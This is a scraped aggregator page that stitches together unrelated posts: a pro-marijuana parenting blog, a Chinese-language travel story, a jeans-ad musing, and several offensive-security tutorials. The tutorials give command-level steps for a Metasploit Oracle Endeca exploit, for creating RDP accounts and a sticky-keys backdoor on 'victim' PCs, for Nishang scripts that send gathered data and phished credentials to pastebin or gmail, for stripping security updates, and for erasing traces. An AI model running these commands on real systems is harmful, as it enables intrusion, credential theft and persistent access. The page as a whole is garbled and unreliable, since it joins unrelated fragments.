Zicutake USA Comment | Search Articles

#History (Education) #Satellite report #Arkansas #Tech #Poker #Language and Life #Critics Cinema #Scientific #Hollywood #Future #Conspiracy #Curiosity #Washington
 Smiley face

[Calculate SHA256 hash]
 Smiley face
Zicutake BROWSER
 Smiley face Encryption Text and HTML
Aspect Ratio Calculator
[HTML color codes]
 Smiley face Conversion to JavaScript
[download YouTube videos in MP4, FLV, 3GP, and many more formats]

 Smiley face Mining Satoshi | Payment speed

 Smiley face
Online BitTorrent Magnet Link Generator


What does THC do?

THC - Tetrahydrocannabinol

"Well, THC is the one we know about because it's the more psychotropic one, and it's the one that Dr. Mechoulam first isolated as the psychotropic compound. I think it was in the 70's, or maybe even the 60's, that he identified THC. Then they identified CBD, Canabidiol. And GW Pharmaceuticals, a company out of the UK, has been extracting CBD and THC from the whole plant...so it's only recently that there's one of the labs in Oakland that's measuring THC and Cannabidiol."
- Dr. Frank  Lucido, family practice
A NORML Life Documentary

Marijuana is used because its primary active ingredient, tetrahydrocannabinol (THC), produces a relaxed state and may heighten the senses. THC causes dopamine release, which produces euphoria. Colors and sounds may seem more intense, time may appear to pass more slowly, and pleasant sensations may be experienced. (About.com, Chemistry)

Écoutez-moi. (Listen).

I'm not here to tell anyone what to do in life. Some may agree with me (thank you, my kind followers) and some may not. That's life! We shouldn't go around judging or trying to control other people's decisions. We know who is the true judge, and it's certainly not us mortals. Know why none of us are "better" than anyone else? Because our judgement day has not yet come. And nope, I'm not talking Terminator 2.

I'm talking about, really, what is a lifetime? How much time do we actually spend here...sixty-ish years average? I don't know the exact statistics but I mean... that's three of your twenties. It's really not that long. Time to live true to ourselves instead of trying to always please others.

If I want to blog about how a plant that is NATURAL and from the earth helps ME be a better person and a better mom...then I guess I just have to do it and quit being quiet about it. 

I guess....it's time to face criticism and debates because I know there are enough supporters and knowers out there. Peace and Stoners, that's how the 70's were that's how the 2000's are. Legalized in TWO states? Frigin GO us. Go Millennials and some of you GenX and Yer's. 

Maybe it's time I say what I actually think...which is I once was a person who got mad at my friends for "tokin up" in front of me and using "illegal drugs!" Good golly one day my best friend Dusty said, "it's just a plant, man" and that was it. I guess just realizing it was a plant made me open my mind to the possibility. And smoking MJ left the most peaceful and still very aware and alert feeling—like my troubles melted away onto the back burner—so I could then make delicious omelets and turkey bacon on the front burners. Meaning, Marijuana just helps you melt your anxiety away for a few hours, helping you focus on the good in life that is still plentiful. Somehow, no matter how broke, worried or stressed about life we are—MJ helps. Every single time.

Yes. I'm a Millennial mom who thinks legalizing MJ for parents everywhere IS the best way to go. For helping cancer patients and those with chronic illness, it IS the way to go. I think organic vegetables and fruits (Gersen Theory) combined with medical marijuana is the path I would take if diagnosed with something fatal and allowed to choose my treatment.

I have more to say, more to think over, and more to be joyful about when I have my morning puff. Because somehow, for me—an American living a perfect American life—that's not enough. I worry too much. I stress too much. It's the luck of the draw and I have to deal with it somehow... in a way that doesn't lead me to an Intervention episode in life. We can say to moms and dads "you should not feel so stressed out! Be thankful for what you have." Sure. But maybe it's not always enough.

Mj helps me get to that "okay, I'm actually a happy person and I can deal with and totally get through this thing called life" mentality that I don't know friends, I honestly don't know how I would get there otherwise. I try and I am a happy person, but if I am honest with myself—there is usually some point of each day that I just feel kind of at my limit, for whatever the reason. It's nice...to have a puff and reopen my connection to my future, my thoughts, my gratitude.

So until I am on a comfy couch with a therapist I can't possibly afford helping me deal with past issues or something...Yes, I will believe in the wonder of a plant that was once listed as "a useful medicine for nausea, rheumatism, and labor pains" and was easily obtained at the general store or pharmacy. It's helped me more than I can imagine. I am thankful Marijuana is now becoming medically and recreationally legal in more states due to the findings and current research about the mental and physical benefits of this "dangerous drug" (on the Fed's list).

Why dangerous?

Because after I puff I want to eat a big sandwich, cuddle with my family, giggle and see the brighter side in life?

Oh yeah. Pull out the list. Dangerous. Check.


FunFact: Legos were invented in the year 1958.

Access backtrack from remote computer using ssh & vnc.

If  you want to access your local computer through remote computer ; first you need configure ssh daemon .Because nowadays people are not using telnet due to plain text protocol.

How to configure ssh in Backtrack 5 r3?

(1)First we have to generate ssh key.So type following in terminal.


It will generate public/private rsa key pair.By default location of keys is /root/.ssh/id_rsa

(2)Now we will move this generated keys in ssh folder.

cd /etc/ssh
mkdir keys

(3)Now copy generated keys from /root/.ssh/id_rsa & paste into keys folder which we create in second step.

(4)Now type following command in terminal
 dpkg-reconfigure openssh-server

(5)Now we have to start ssh daemon ; so type following in terminal
service ssh start
(6)Now everything is setup ; you can use your ssh server via remote machine.
For windows you can also use putty like software.If you are on linux machine than type following command.
ssh -l "username"


If you don`t want to use ssh ; i mean you are not comfortable with command line then you can configure vnc.

How to setup VNC in backtrack 5 r3?

(1)apt-get install tightvncserver


(3)You will promoted to password .

(4)Enter view only password

Now for access of vnc server we have two options

(1)If you are on linux os than use Remote Desktop Viewer

apt-get install vinagre

And from Edit>plugins check vnc option

Now click on connect & enter i.p. address.

(2)If you are on windows os than use tighvnc . Download from here

After installing Start | All Programs | TightVNC | TightVNC Viewer
Add remote host address  with port number If you do not enter the port, the Windows version of TightVNC Viewer will assume the port to be 5900 and will not be able to connect.

Now you can see that we can open our backtrack os using vnc from remote pc.

Exploit Oracle Endeca Server with metasploit.

This module exploits a command injection vulnerability on the Oracle  Endeca Server 7.4.0. The vulnerability exists on the createDataStore  method from the controlSoapBinding web service. The vulnerable method only exists on the 7.4.0 branch and isn't available on the branch. On the other hand, the injection has been found to be Windows specific. This module has been tested successfully on Endeca Server over Windows 2008 R2 (64 bits).

First run ./msfupdate or git pull to update metasploit.

Now when you open metasploit & found error like this
[-]     /opt/msf/modules/exploits/windows/http/oracle_endeca_exec.rb: NameError uninitialized constant Msf::Exploit::Powershell .

Open oracle_endeca_exec.rb file in any editor.
Add this line require 'msf/core/exploit/powershell' after require 'msf/core'.
So it look like
require 'msf/core'
require 'msf/core/exploit/powershell'
Save it & open metasploit again.

Exploit target:

   Id  Name
   --  ----
   0   Oracle Endeca Server 7.4.0 / Microsoft Windows 2008 R2 64 bits

msf > use exploit/windows/http/oracle_endeca_exec
msf exploit(oracle_endeca_exec) > set rhost`s i.p.)
rhost =>
msf exploit(oracle_endeca_exec) > run


How to get plain text source from shc compiled bash script?

Shc is used to protect your shell script from modification or inspection. If you created bash script want to distribute it , but dono`t want them to easily readble by other people , then you can use it.

First we see how to compiled bash script to binary?

wget http://www.datsi.fi.upm.es/~frosal/sources/shc-3.8.7.tgz

tar -xvzf shc-3.8.7.tgz

cd shc-3.8.7



You can see shc usage message.
shc Usage: shc [-e date] [-m addr] [-i iopt] [-x cmnd] [-l lopt] [-rvDTCAh] -f script

Now we have script which we want to convert in binary.

./shc -f /script_path

So now you can see that it will convert plain text bash source into binary which extension is  .sh.x.

How to retrieve plain text from binary?

The shc compiled binary decrypts and loads the script into memory when started right after we started the binary, just segfault it and retrieve our script from the core dump.

Core dumps are often used to  debug errors in Linux or UNIX programs. A core file is generated when an application program abnormally terminates due to bug, operating system security protection schema, or program simply try to write beyond the area of memory it has allocated.

By default most of linux distributions turn off core file creation.
So we need to turn on core file creation.

ulimit -c

If output is zero means that core file is not created.

Now we set core file size limit to 70000 byte

ulimit -c 70000

Now we start binary & segfault it right away.I used IP-Digger binary to get plain text from it.

./IP-Digger4.sh.x&  ( sleep 0.02 && kill -SIGSEGV $! )

 sleep 0.02 will give the binary enough time to start up and decrypt the original script. The variable $! contains the pid of the last background process started, so we can easily kill it with the segmentation fault signal SIGSEGV (same as kill -11 $!). 
+ segmentation fault (core dumped)  ./IP-Digger4.sh.x
cat core | strings >plain_text


Now open plain_text file which we created & find plain text source of bash script.I upload source code of ip-digger here .

But if your script is too large then adjust core file size.

Post exploitation & swaparoo backdoor.

Today we are going to create valid RDP user in victim pc using two method.

(1)As usual get meterpreter session of victim using metasploit.We need system privilege So use getsystem .(getsystem will work in xp. But if victim has windows 7 than you have to use bypassuac module;it will work if victim has admin provilage.But most of time detecetd by AV. So you have to encode it. )

Now we use meterpreter script which create RDP useraccount for logon.
run getgui -u username -p password.


Now Useraccount has been created.You can use rdesktop command to connect with victim using created credentials.

rdesktop victim i.p.


When you complete your session type following command for cleanup process; so after you logoff created useraccount will be deleted.

run multi_console_command -rc /root/msf4/logs/scripts/getgui/clean_up_what_ever_file_name.rc

(2)Now we use another method; it`s backdoor.But it`s physical backdoor; so you have to present at victim pc to get access.But backdoor is created remotely.

Download swaparoo script from here .

Put it into the /opt/msf/scripts/meterpreter folder

After that get meterpreter shell using any method.

Now type run swaparoo -h

Now type  run swaparoo


As you can see in image last line is  "[+] Press Shift key 5 times at Login Screen and you should be greeted by a shell!"

So when you restart victim pc & login screen appear ; just press shift key 5 times (From victim `s keyboard)you get cmd with system privilege.Now from cmd you can do anything like remove user,add user, change password.

If you want to remove this backdoor then type following command

run swaparoo -r 

What`s limitation?

Anyone who is physically  present at terminal can get system cmd just by pressing keys.Because it does not ask for credentials.

Post exploitation using Nishang.

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and post exploitation during Penetraion Tests. The scripts are written on the basis of requirement by the author during real Penetration Tests.

This framework is written by Nikhil Mittal who is also author of Kautilya framework.For more information you can visit his blog.

Today we will see some basic module from nishang framework for post exploitation.

This tutorial is about post exploitation so first get meterpreter shell using any metasploit method. If you are new than visit metasploit section of blog.

(1)Download nishang from here .
(2)Unzip it & put it in root directory.

cd C:\\Users/victim
mkdir 123

meterpreter>upload /root/nishang/ C:\\Users/victim/123

We upload all powershell script from our nishang folder to victim pc `s folder.


After upload we have to get shell.

cd c://Windows\System32\WindowsPowerShell\v1.0

So now everything is set ; we execute our powershell script from our shell.

(1)First we use Information Gather module. It gather all informataion from victim pc & it has exifil option so gatherd information is directly uploaded to the pastebin;gmail.

So type following in our shell

powershell.exe -ExecutionPolicy Bypass -command C:\\Users/victim/123/Information_Gather.ps1 -exfil AIP_Of_Pastebin username password 1


After execution complete information is uploaded to the your pastebin account.

This information is encoded in base64; so to get plain text decode it using base64 decoder.

(2)Another module is credential pop up. So it pop up credential menu in victim screen ; if victim enter right password then it will stop ;otherwise it will pop up again.

powershell.exe -ExecutionPolicy Bypass -command C:\\Users/victim/123/Credentials.ps1 -exfil AIP_Of_Pastebin username password 1


(3)Other good module is removing update from victim`s p.c.

To all updates from the target.
powershell.exe -ExecutionPolicy Bypass -command C:\\Users/victim/123/Remove-Update.ps1 All

TO remove all security updates from the target.
powershell.exe -ExecutionPolicy Bypass -command C:\\Users/victim/123/Remove-Update.ps1 Security

To remove specific update from target.
powershell.exe -ExecutionPolicy Bypass -command C:\\Users/victim/123/Remove-Update.ps1 KB2761226

(4)Speaks:-This powershell script speak text in victim`s pc which we write in our shell.

powershell.exe -ExecutionPolicy Bypass -command C:\\Users/victim/123/Speak.ps1 'Hello sir; you have been hacked'

These are  basic module ; there are also advanced module in nishnag.If you need more information than visit this link.

After using powershell script remove folder & clear event.
cd C:\\Users/victim
RD /s /q 123

[遊戲無關]賓妹傳奇 Lost in Boracay


在長灘島某一個晚上,我在一個叫做Charlh's Bar的地方遺失我的iPhone 4S,隔天去詢問所有店員,所有人皆表示沒看到。

那天,我們一人大概也付了100-200 Peso的小費,其中一個女生還給一位男服務生500 Peso以上的小費,那個晚上的花費也超過8000多 Peso,當然該付的也沒有少付,而且還很熱情跟他們工作人員一起跳舞、合照。隔天詢問時,自然而然的他很熱心的幫我詢問,我也沒有多疑心,只好聳聳肩繼續旅行。

因為工作的關係,從事手機遊戲相關的工作,回國第一天上班就是去買一台iPhone 5,接上Wifi開始用iCloud同步我的資料,每次同步聯絡人隔沒多久又被刪掉,當時正流行聯絡人自動消失的Bug,我也沒多想。有一次無意打開照片串流這個功能,沒想到........


當然你以為劇情這樣結束了嗎? 其實麻哩壓的學習能力很強,她接著開始使用我的Instagram等App,並起直接使用我的帳號。

當然你會問為什麼你不用Find My iPhone的功能把她鎖起來,其實我做過,但悲劇就發生了。怎麼刪都刪不到她那隻。



突然我腦袋靈光一閃:對耶!她是我們的Waitress,那天去找手機也有問她啊!! 唉~切心啊!我現在對菲律賓人非常感冒,這個Po文期間又恰巧經歷菲國射殺我國漁民事件,對於菲律賓人真的很感冒,何況我當時從馬尼拉轉機到長灘時攜帶機場買的Whiskey,因為拆封就被沒收然後公然索賄80美金,我也很不爽。 原本我對菲律賓人的評價還不錯。好吧!大家看看其他麻哩壓的照片集吧!


P.S. Charlh's Bar的 Mango Daiquiri很好喝,是用一整顆新鮮的芒果加Rum去調的,另外他的吧檯是半圓形的木頭高腳吧,中間是Live Band表演,非常近、很有臨場感,有機會去長灘島就去喝一杯吧!順便幫我跟麻哩壓打招呼,問問:"Hey! How's the iPhone?"

   Ariel's Point @Boracay, a must-go for cliff diving! jump!

Undead? Perhaps. Unfashionable? Never!

In a recent issue of Esquire, I saw this image in a full-page ad for Adriano Goldschmied jeans.

Its strategy for selling jeans puzzled me.  A common interpretation of how advertising works, especially glossy magazine advertising, is that it appeals to the viewer's fantasies -- owning this product can help you attract or be like the person in the image.

But what if I do not wish to date nor be a 20-something hipster zombie?

Honestly, this couple looks like something Rick and his band of misfits from The Walking Dead would encounter if they made it as far west as Santa Monica.